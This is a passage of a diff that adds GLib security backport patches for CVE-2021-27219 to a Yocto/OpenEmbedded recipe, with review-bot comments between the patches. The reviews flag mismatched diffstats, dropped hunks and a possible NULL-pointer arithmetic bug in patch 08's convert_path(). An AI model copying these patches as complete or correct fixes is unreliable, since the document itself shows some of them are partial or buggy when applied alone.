+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/gbytes.c | 6 ++++--
+ glib/gdir.c | 3 ++-
+ glib/ghash.c | 7 ++++---
+ glib/giochannel.c | 5 +++--
+ glib/gslice.c | 3 ++-
+ glib/gtestutils.c | 3 ++-
+ glib/gvariant.c | 7 ++++---
+ glib/gvarianttype.c | 3 ++-
+ glib/tests/array-test.c | 4 +++-
+ glib/tests/option-context.c | 6 ++++--
+ glib/tests/uri.c | 8 +++++---
+ 11 files changed, 35 insertions(+), 20 deletions(-)
+
+--- a/glib/gbytes.c
++++ b/glib/gbytes.c
+@@ -34,6 +34,8 @@
+
+ #include <string.h>
+
++#include "gstrfuncsprivate.h"
++
+ /**
+ * GBytes:
+ *
+@@ -95,7 +97,7 @@ g_bytes_new (gconstpointer data,
+ {
+ g_return_val_if_fail (data != NULL || size == 0, NULL);
+
+- return g_bytes_new_take (g_memdup (data, size), size);
++ return g_bytes_new_take (g_memdup2 (data, size), size);
+ }
+
+ /**
+@@ -499,7 +501,7 @@ g_bytes_unref_to_data (GBytes *bytes,
+ * Copy: Non g_malloc (or compatible) allocator, or static memory,
+ * so we have to copy, and then unref.
+ */
+- result = g_memdup (bytes->data, bytes->size);
++ result = g_memdup2 (bytes->data, bytes->size);
+ *size = bytes->size;
+ g_bytes_unref (bytes);
+ }
+--- a/glib/gdir.c
++++ b/glib/gdir.c
+@@ -37,6 +37,7 @@
+ #include "gconvert.h"
+ #include "gfileutils.h"
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gtestutils.h"
+ #include "glibintl.h"
+
+@@ -112,7 +113,7 @@ g_dir_open_with_errno (const gchar *path
+ return NULL;
+ #endif
+
+- return g_memdup (&dir, sizeof dir);
++ return g_memdup2 (&dir, sizeof dir);
+ }
+
+ /**
+--- a/glib/ghash.c
++++ b/glib/ghash.c
+@@ -34,6 +34,7 @@
+ #include "gmacros.h"
+ #include "glib-private.h"
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gatomic.h"
+ #include "gtestutils.h"
+ #include "gslice.h"
+@@ -962,7 +963,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
+ if (hash_table->have_big_keys)
+ {
+ if (key != value)
+- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size);
++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size);
+ /* Keys and values are both big now, so no need for further checks */
+ return;
+ }
+@@ -970,7 +971,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
+ {
+ if (key != value)
+ {
+- hash_table->values = g_memdup (hash_table->keys, sizeof (guint) * hash_table->size);
++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (guint) * hash_table->size);
+ is_a_set = FALSE;
+ }
+ }
+@@ -998,7 +999,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
+
+ /* Just split if necessary */
+ if (is_a_set && key != value)
+- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size);
++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size);
+
+ #endif
+ }
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -35,7 +35,7 @@
+ #include <errno.h>
+
+ #include "giochannel.h"
+-
++#include "gstrfuncsprivate.h"
+ #include "gstrfuncs.h"
+ #include "gtestutils.h"
+ #include "glibintl.h"
+
+@@ -1673,10 +1674,10 @@ g_io_channel_read_line (GIOChannel *cha
+
+ /* Copy the read bytes (including any embedded nuls) and nul-terminate.
+ * `USE_BUF (channel)->str` is guaranteed to be nul-terminated as it’s a
+- * #GString, so it’s safe to call g_memdup() with +1 length to allocate
++ * #GString, so it’s safe to call g_memdup2() with +1 length to allocate
+ * a nul-terminator. */
+ g_assert (USE_BUF (channel));
+- line = g_memdup (USE_BUF (channel)->str, got_length + 1);
++ line = g_memdup2 (USE_BUF (channel)->str, got_length + 1);
+ line[got_length] = '\0';
+ *str_return = g_steal_pointer (&line);
+ g_string_erase (USE_BUF (channel), 0, got_length);
+--- a/glib/gslice.c
++++ b/glib/gslice.c
+@@ -41,6 +41,7 @@
+ #include "gmain.h"
+ #include "gmem.h" /* gslice.h */
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gutils.h"
+ #include "gtrashstack.h"
+ #include "gtestutils.h"
+@@ -350,7 +351,7 @@ g_slice_get_config_state (GSliceConfig c
+ array[i++] = allocator->contention_counters[address];
+ array[i++] = allocator_get_magazine_threshold (allocator, address);
+ *n_values = i;
+- return g_memdup (array, sizeof (array[0]) * *n_values);
++ return g_memdup2 (array, sizeof (array[0]) * *n_values);
+ default:
+ return NULL;
+ }
+--- a/glib/gtestutils.c
++++ b/glib/gtestutils.c
+@@ -49,6 +49,7 @@
+ #include "gpattern.h"
+ #include "grand.h"
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gtimer.h"
+ #include "gslice.h"
+ #include "gspawn.h"
+@@ -3803,7 +3804,7 @@ g_test_log_extract (GTestLogBuffer *tbuf
+ if (p <= tbuffer->data->str + mlength)
+ {
+ g_string_erase (tbuffer->data, 0, mlength);
+- tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup (&msg, sizeof (msg)));
++ tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup2 (&msg, sizeof (msg)));
+ return TRUE;
+ }
+
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -33,6 +33,7 @@
+
+ #include <string.h>
+
++#include "gstrfuncsprivate.h"
+
+ /**
+ * SECTION:gvariant
+@@ -725,7 +726,7 @@ g_variant_new_variant (GVariant *value)
+ g_variant_ref_sink (value);
+
+ return g_variant_new_from_children (G_VARIANT_TYPE_VARIANT,
+- g_memdup (&value, sizeof value),
++ g_memdup2 (&value, sizeof value),
+ 1, g_variant_is_trusted (value));
+ }
+
+@@ -1229,7 +1230,7 @@ g_variant_new_fixed_array (const GVarian
+ return NULL;
+ }
+
+- data = g_memdup (elements, n_elements * element_size);
++ data = g_memdup2 (elements, n_elements * element_size);
+ value = g_variant_new_from_data (array_type, data,
+ n_elements * element_size,
+ FALSE, g_free, data);
+@@ -1908,7 +1909,7 @@ g_variant_dup_bytestring (GVariant *valu
+ if (length)
+ *length = size;
+
+- return g_memdup (original, size + 1);
++ return g_memdup2 (original, size + 1);
+ }
+
+ /**
+--- a/glib/gvarianttype.c
++++ b/glib/gvarianttype.c
+@@ -28,6 +28,7 @@
+
+ #include <string.h>
+
++#include "gstrfuncsprivate.h"
+
+ /**
+ * SECTION:gvarianttype
+@@ -1181,7 +1182,7 @@ g_variant_type_new_tuple (const GVariant
+ g_assert (offset < sizeof buffer);
+ buffer[offset++] = ')';
+
+- return (GVariantType *) g_memdup (buffer, offset);
++ return (GVariantType *) g_memdup2 (buffer, offset);
+ }
+
+ /**
+--- a/glib/tests/array-test.c
++++ b/glib/tests/array-test.c
+@@ -29,6 +29,8 @@
+ #include <string.h>
+ #include "glib.h"
+
++#include "gstrfuncsprivate.h"
++
+ /* Test data to be passed to any function which calls g_array_new(), providing
+ * the parameters for that call. Most #GArray tests should be repeated for all
+ * possible values of #ArrayTestData. */
+@@ -1917,7 +1919,7 @@ byte_array_new_take (void)
+ GByteArray *gbarray;
+ guint8 *data;
+
+- data = g_memdup ("woooweeewow", 11);
++ data = g_memdup2 ("woooweeewow", 11);
+ gbarray = g_byte_array_new_take (data, 11);
+ g_assert (gbarray->data == data);
+ g_assert_cmpuint (gbarray->len, ==, 11);
+--- a/glib/tests/option-context.c
++++ b/glib/tests/option-context.c
+@@ -27,6 +27,8 @@
+ #include <string.h>
+ #include <locale.h>
+
++#include "gstrfuncsprivate.h"
++
+ static GOptionEntry main_entries[] = {
+ { "main-switch", 0, 0,
+ G_OPTION_ARG_NONE, NULL,
+@@ -256,7 +258,7 @@ join_stringv (int argc, char **argv)
+ static char **
+ copy_stringv (char **argv, int argc)
+ {
+- return g_memdup (argv, sizeof (char *) * (argc + 1));
++ return g_memdup2 (argv, sizeof (char *) * (argc + 1));
+ }
+
+ static void
+@@ -2323,7 +2325,7 @@ test_group_parse (void)
+ g_option_context_add_group (context, group);
+
+ argv = split_string ("program --test arg1 -f arg2 --group-test arg3 --frob arg4 -z arg5", &argc);
+- orig_argv = g_memdup (argv, (argc + 1) * sizeof (char *));
++ orig_argv = g_memdup2 (argv, (argc + 1) * sizeof (char *));
+
+ retval = g_option_context_parse (context, &argc, &argv, &error);
+
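Review bot: The diffstat in this patch lists `glib/tests/uri.c | 8 +++++---` and "11 files changed", but the patch body ends after the `glib/tests/option-context.c` section and contains no `uri.c` hunk. The message opens with `Backport of:`, so the hunk was presumably dropped on purpose for this GLib version, but nothing records that. A short line above the `Upstream-Status` trailer, for example `[Dropped glib/tests/uri.c hunk: not applicable to this version]` (wording to be confirmed by the submitter), together with a regenerated diffstat, would let a later reviewer tell an intentional change from a truncated patch. The `glib/giochannel.c` hunk headers (`-35,7 +35,7` followed by `-1673,10 +1674,10`) also look hand-edited and are worth refreshing against the target tree.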
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch
new file mode 100644
index 0000000000..4f86522d00
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch
@@ -0,0 +1,54 @@
+From 0cbad673215ec8a049b7fe2ff44b0beed31b376e Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 16:12:24 +0000
+Subject: [PATCH 05/11] gwinhttpfile: Avoid arithmetic overflow when
+ calculating a size
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The members of `URL_COMPONENTS` (`winhttp_file->url`) are `DWORD`s, i.e.
+32-bit unsigned integers. Adding to and multiplying them may cause them
+to overflow the unsigned integer bounds, even if the result is passed to
+`g_memdup2()` which accepts a `gsize`.
+
+Cast the `URL_COMPONENTS` members to `gsize` first to ensure that the
+arithmetic is done in terms of `gsize`s rather than unsigned integers.
+
+Spotted by Sebastian Dröge.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/win32/gwinhttpfile.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/gio/win32/gwinhttpfile.c b/gio/win32/gwinhttpfile.c
+index 3f8fbd838..e0340e247 100644
+--- a/gio/win32/gwinhttpfile.c
++++ b/gio/win32/gwinhttpfile.c
+@@ -410,10 +410,10 @@ g_winhttp_file_resolve_relative_path (GFile *file,
+ child = g_object_new (G_TYPE_WINHTTP_FILE, NULL);
+ child->vfs = winhttp_file->vfs;
+ child->url = winhttp_file->url;
+- child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
+- child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
+- child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
+- child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
++ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, ((gsize) winhttp_file->url.dwSchemeLength + 1) * 2);
++ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, ((gsize) winhttp_file->url.dwHostNameLength + 1) * 2);
++ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, ((gsize) winhttp_file->url.dwUserNameLength + 1) * 2);
++ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, ((gsize) winhttp_file->url.dwPasswordLength + 1) * 2);
+ child->url.lpszUrlPath = wnew_path;
+ child->url.dwUrlPathLength = wcslen (wnew_path);
+ child->url.lpszExtraInfo = NULL;
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch
new file mode 100644
index 0000000000..d8043f5e29
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch
@@ -0,0 +1,101 @@
+From f9ee2275cbc312c0b4cdbc338a4fbb76eb36fb9a Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:49:00 +0000
+Subject: [PATCH 06/11] gdatainputstream: Handle stop_chars_len internally as
+ gsize
+
+Previously it was handled as a `gssize`, which meant that if the
+`stop_chars` string was longer than `G_MAXSSIZE` there would be an
+overflow.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gdatainputstream.c | 25 +++++++++++++++++--------
+ 1 file changed, 17 insertions(+), 8 deletions(-)
+
+diff --git a/gio/gdatainputstream.c b/gio/gdatainputstream.c
+index 2e7750cb5..2cdcbda19 100644
+--- a/gio/gdatainputstream.c
++++ b/gio/gdatainputstream.c
+@@ -27,6 +27,7 @@
+ #include "gioenumtypes.h"
+ #include "gioerror.h"
+ #include "glibintl.h"
++#include "gstrfuncsprivate.h"
+
+ #include <string.h>
+
+@@ -856,7 +857,7 @@ static gssize
+ scan_for_chars (GDataInputStream *stream,
+ gsize *checked_out,
+ const char *stop_chars,
+- gssize stop_chars_len)
++ gsize stop_chars_len)
+ {
+ GBufferedInputStream *bstream;
+ const char *buffer;
+@@ -952,7 +953,7 @@ typedef struct
+ gsize checked;
+
+ gchar *stop_chars;
+- gssize stop_chars_len;
++ gsize stop_chars_len;
+ gsize length;
+ } GDataInputStreamReadData;
+
+@@ -1078,12 +1079,17 @@ g_data_input_stream_read_async (GDataInputStream *stream,
+ {
+ GDataInputStreamReadData *data;
+ GTask *task;
++ gsize stop_chars_len_unsigned;
+
+ data = g_slice_new0 (GDataInputStreamReadData);
+- if (stop_chars_len == -1)
+- stop_chars_len = strlen (stop_chars);
+- data->stop_chars = g_memdup (stop_chars, stop_chars_len);
+- data->stop_chars_len = stop_chars_len;
++
++ if (stop_chars_len < 0)
++ stop_chars_len_unsigned = strlen (stop_chars);
++ else
++ stop_chars_len_unsigned = (gsize) stop_chars_len;
++
++ data->stop_chars = g_memdup2 (stop_chars, stop_chars_len_unsigned);
++ data->stop_chars_len = stop_chars_len_unsigned;
+ data->last_saw_cr = FALSE;
+
+ task = g_task_new (stream, cancellable, callback, user_data);
+@@ -1338,17 +1344,20 @@ g_data_input_stream_read_upto (GDataInputStream *stream,
+ gssize found_pos;
+ gssize res;
+ char *data_until;
++ gsize stop_chars_len_unsigned;
+
+ g_return_val_if_fail (G_IS_DATA_INPUT_STREAM (stream), NULL);
+
+ if (stop_chars_len < 0)
+- stop_chars_len = strlen (stop_chars);
++ stop_chars_len_unsigned = strlen (stop_chars);
++ else
++ stop_chars_len_unsigned = (gsize) stop_chars_len;
+
+ bstream = G_BUFFERED_INPUT_STREAM (stream);
+
+ checked = 0;
+
+- while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len)) == -1)
++ while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len_unsigned)) == -1)
+ {
+ if (g_buffered_input_stream_get_available (bstream) ==
+ g_buffered_input_stream_get_buffer_size (bstream))
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch
new file mode 100644
index 0000000000..f183939c45
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch
@@ -0,0 +1,76 @@
+From 2aaf593a9eb96d84fe3be740aca2810a97d95592 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:50:37 +0000
+Subject: [PATCH 07/11] gwin32: Use gsize internally in g_wcsdup()
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows it to handle strings up to length `G_MAXSIZE` — previously
+it would overflow with such strings.
+
+Update the several copies of it identically.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gwin32registrykey.c | 34 ++++++++++++++++++++++++++--------
+ 2 files changed, 38 insertions(+), 16 deletions(-)
+
+diff --git a/gio/gwin32registrykey.c b/gio/gwin32registrykey.c
+index 548a94188..2eb67daf8 100644
+--- a/gio/gwin32registrykey.c
++++ b/gio/gwin32registrykey.c
+@@ -127,16 +127,34 @@ typedef enum
+ G_WIN32_REGISTRY_UPDATED_PATH = 1,
+ } GWin32RegistryKeyUpdateFlag;
+
++static gsize
++g_utf16_len (const gunichar2 *str)
++{
++ gsize result;
++
++ for (result = 0; str[0] != 0; str++, result++)
++ ;
++
++ return result;
++}
++
+ static gunichar2 *
+-g_wcsdup (const gunichar2 *str,
+- gssize str_size)
++g_wcsdup (const gunichar2 *str, gssize str_len)
+ {
+- if (str_size == -1)
+- {
+- str_size = wcslen (str) + 1;
+- str_size *= sizeof (gunichar2);
+- }
+- return g_memdup (str, str_size);
++ gsize str_len_unsigned;
++ gsize str_size;
++
++ g_return_val_if_fail (str != NULL, NULL);
++
++ if (str_len < 0)
++ str_len_unsigned = g_utf16_len (str);
++ else
++ str_len_unsigned = (gsize) str_len;
++
++ g_assert (str_len_unsigned <= G_MAXSIZE / sizeof (gunichar2) - 1);
++ str_size = (str_len_unsigned + 1) * sizeof (gunichar2);
++
++ return g_memdup2 (str, str_size);
+ }
+
+ /**
+--
+GitLab
+
+
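Review bot: The diffstat in this patch header says `2 files changed, 38 insertions(+), 16 deletions(-)`, but the patch lists and changes only `gio/gwin32registrykey.c`, even though the message says the several copies of `g_wcsdup()` are updated identically. It looks as if the hunk for the second copy was dropped during the backport. If that copy does not exist in the recipe's glib version, the header should say so, for example `Comment: hunk for the second g_wcsdup() copy dropped, not present in this version`; otherwise that copy keeps the old `g_memdup()` size arithmetic. This file appears to be Windows-only, so a Linux target build would probably not show the difference.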
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch
new file mode 100644
index 0000000000..ffafc35c07
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch
@@ -0,0 +1,101 @@
+From ba8ca443051f93a74c0d03d62e70402036f967a5 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:58:32 +0000
+Subject: [PATCH 08/11] gkeyfilesettingsbackend: Handle long keys when
+ converting paths
+
+Previously, the code in `convert_path()` could not handle keys longer
+than `G_MAXINT`, and would overflow if that was exceeded.
+
+Convert the code to use `gsize` and `g_memdup2()` throughout, and
+change from identifying the position of the final slash in the string
+using a signed offset `i`, to using a pointer to the character (and
+`strrchr()`). This allows the slash to be at any position in a
+`G_MAXSIZE`-long string, without sacrificing a bit of the offset for
+indicating whether a slash was found.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 21 ++++++++++-----------
+ 1 file changed, 10 insertions(+), 11 deletions(-)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index cd5765afd..25b057672 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -33,6 +33,7 @@
+ #include "gfilemonitor.h"
+ #include "gsimplepermission.h"
+ #include "gsettingsbackendinternal.h"
++#include "gstrfuncsprivate.h"
+ #include "giomodule-priv.h"
+ #include "gportalsupport.h"
+
+@@ -145,8 +146,8 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+ gchar **group,
+ gchar **basename)
+ {
+- gint key_len = strlen (key);
+- gint i;
++ gsize key_len = strlen (key);
++ const gchar *last_slash;
+
+ if (key_len < kfsb->prefix_len ||
+ memcmp (key, kfsb->prefix, kfsb->prefix_len) != 0)
+@@ -155,38 +156,36 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+ key_len -= kfsb->prefix_len;
+ key += kfsb->prefix_len;
+
+- for (i = key_len; i >= 0; i--)
+- if (key[i] == '/')
+- break;
++ last_slash = strrchr (key, '/');
+
+ if (kfsb->root_group)
+ {
+ /* if a root_group was specified, make sure the user hasn't given
+ * a path that ghosts that group name
+ */
+- if (i == kfsb->root_group_len && memcmp (key, kfsb->root_group, i) == 0)
++ if (last_slash != NULL && (last_slash - key) == kfsb->root_group_len && memcmp (key, kfsb->root_group, last_slash - key) == 0)
+ return FALSE;
+ }
+ else
+ {
+ /* if no root_group was given, ensure that the user gave a path */
+- if (i == -1)
++ if (last_slash == NULL)
+ return FALSE;
+ }
+
+ if (group)
+ {
+- if (i >= 0)
++ if (last_slash != NULL)
+ {
+- *group = g_memdup (key, i + 1);
+- (*group)[i] = '\0';
++ *group = g_memdup2 (key, (last_slash - key) + 1);
++ (*group)[(last_slash - key)] = '\0';
+ }
+ else
+ *group = g_strdup (kfsb->root_group);
+ }
+
+ if (basename)
+- *basename = g_memdup (key + i + 1, key_len - i);
++ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
+
+ return TRUE;
+ }
+--
+GitLab
+
+
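Review bot: The `if (basename)` branch at the end of `convert_path()` passes `last_slash + 1` to `g_memdup2()` even when `strrchr()` returned NULL, which is reachable when `root_group` is set and the key contains no slash. The guard arrives only in CVE-2021-27219-reg2-1.patch, so this patch is not safe to carry on its own. The same holds for CVE-2021-27219-10.patch and -11.patch, whose `g_return_if_fail (length_unsigned > G_MAXSSIZE)` and `g_return_if_fail (length_size > G_MAXUINT)` checks are inverted until reg1-4 and reg1-1 are applied. Recipe patches are often cherry-picked one at a time between branches, so I would record the dependency in each header, e.g. `Comment: must be applied together with CVE-2021-27219-reg2-1.patch`, or squash each regression fix into the patch it corrects.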
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch
new file mode 100644
index 0000000000..8efb7c720f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch
@@ -0,0 +1,100 @@
+From 65ec7f4d6e8832c481f6e00e2eb007b9a60024ce Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:00:53 +0000
+Subject: [PATCH 09/11] =?UTF-8?q?gsocket:=20Use=20gsize=20to=20track=20nat?=
+ =?UTF-8?q?ive=20sockaddr=E2=80=99s=20size?=
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Don’t use an `int`, that’s potentially too small. In practical terms,
+this is not a problem, since no socket address is going to be that big.
+
+By making these changes we can use `g_memdup2()` without warnings,
+though. Fewer warnings is good.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gsocket.c | 16 ++++++++++------
+ 1 file changed, 10 insertions(+), 6 deletions(-)
+
+--- a/gio/gsocket.c
++++ b/gio/gsocket.c
+@@ -75,6 +75,7 @@
+ #include "gcredentialsprivate.h"
+ #include "glibintl.h"
+ #include "gioprivate.h"
++#include "gstrfuncsprivate.h"
+
+ #ifdef G_OS_WIN32
+ /* For Windows XP runtime compatibility, but use the system's if_nametoindex() if available */
+@@ -174,7 +175,7 @@ static gboolean g_socket_datagram_ba
+ GError **error);
+
+ static GSocketAddress *
+-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len);
++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len);
+
+ static gssize
+ g_socket_receive_message_with_timeout (GSocket *socket,
+@@ -260,7 +261,7 @@ struct _GSocketPrivate
+ struct {
+ GSocketAddress *addr;
+ struct sockaddr *native;
+- gint native_len;
++ gsize native_len;
+ guint64 last_used;
+ } recv_addr_cache[RECV_ADDR_CACHE_SIZE];
+ };
+@@ -5259,14 +5260,14 @@ g_socket_send_messages_with_timeout (GSo
+ }
+
+ static GSocketAddress *
+-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len)
++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len)
+ {
+ GSocketAddress *saddr;
+ gint i;
+ guint64 oldest_time = G_MAXUINT64;
+ gint oldest_index = 0;
+
+- if (native_len <= 0)
++ if (native_len == 0)
+ return NULL;
+
+ saddr = NULL;
+@@ -5274,7 +5275,7 @@ cache_recv_address (GSocket *socket, str
+ {
+ GSocketAddress *tmp = socket->priv->recv_addr_cache[i].addr;
+ gpointer tmp_native = socket->priv->recv_addr_cache[i].native;
+- gint tmp_native_len = socket->priv->recv_addr_cache[i].native_len;
++ gsize tmp_native_len = socket->priv->recv_addr_cache[i].native_len;
+
+ if (!tmp)
+ continue;
+@@ -5304,7 +5305,7 @@ cache_recv_address (GSocket *socket, str
+ g_free (socket->priv->recv_addr_cache[oldest_index].native);
+ }
+
+- socket->priv->recv_addr_cache[oldest_index].native = g_memdup (native, native_len);
++ socket->priv->recv_addr_cache[oldest_index].native = g_memdup2 (native, native_len);
+ socket->priv->recv_addr_cache[oldest_index].native_len = native_len;
+ socket->priv->recv_addr_cache[oldest_index].addr = g_object_ref (saddr);
+ socket->priv->recv_addr_cache[oldest_index].last_used = g_get_monotonic_time ();
+@@ -5452,6 +5453,9 @@ g_socket_receive_message_with_timeout (G
+ /* do it */
+ while (1)
+ {
++ /* addrlen has to be of type int because that’s how WSARecvFrom() is defined */
++ G_STATIC_ASSERT (sizeof addr <= G_MAXINT);
++
+ addrlen = sizeof addr;
+ if (address)
+ result = WSARecvFrom (socket->priv->fd,
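Review bot: With `native_len` now a `size_t` in `cache_recv_address()`, the guard `if (native_len == 0)` no longer rejects a negative length. A caller that still holds the length in an `int` would have a negative value converted to a very large one, which passes the check and reaches `g_memdup2 (native, native_len)`. The call sites are outside these hunks, so it is worth confirming that each one passes a length that has already been validated as non-negative. The added `G_STATIC_ASSERT` covers only the size of the local `addr` buffer, not the value the receive call writes back into `addrlen`.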
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch
new file mode 100644
index 0000000000..63fda0b600
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch
@@ -0,0 +1,59 @@
+From 777b95a88f006d39d9fe6d3321db17e7b0d4b9a4 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:07:39 +0000
+Subject: [PATCH 10/11] gtlspassword: Forbid very long TLS passwords
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The public API `g_tls_password_set_value_full()` (and the vfunc it
+invokes) can only accept a `gssize` length. Ensure that nul-terminated
+strings passed to `g_tls_password_set_value()` can’t exceed that length.
+Use `g_memdup2()` to avoid an overflow if they’re longer than
+`G_MAXUINT` similarly.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
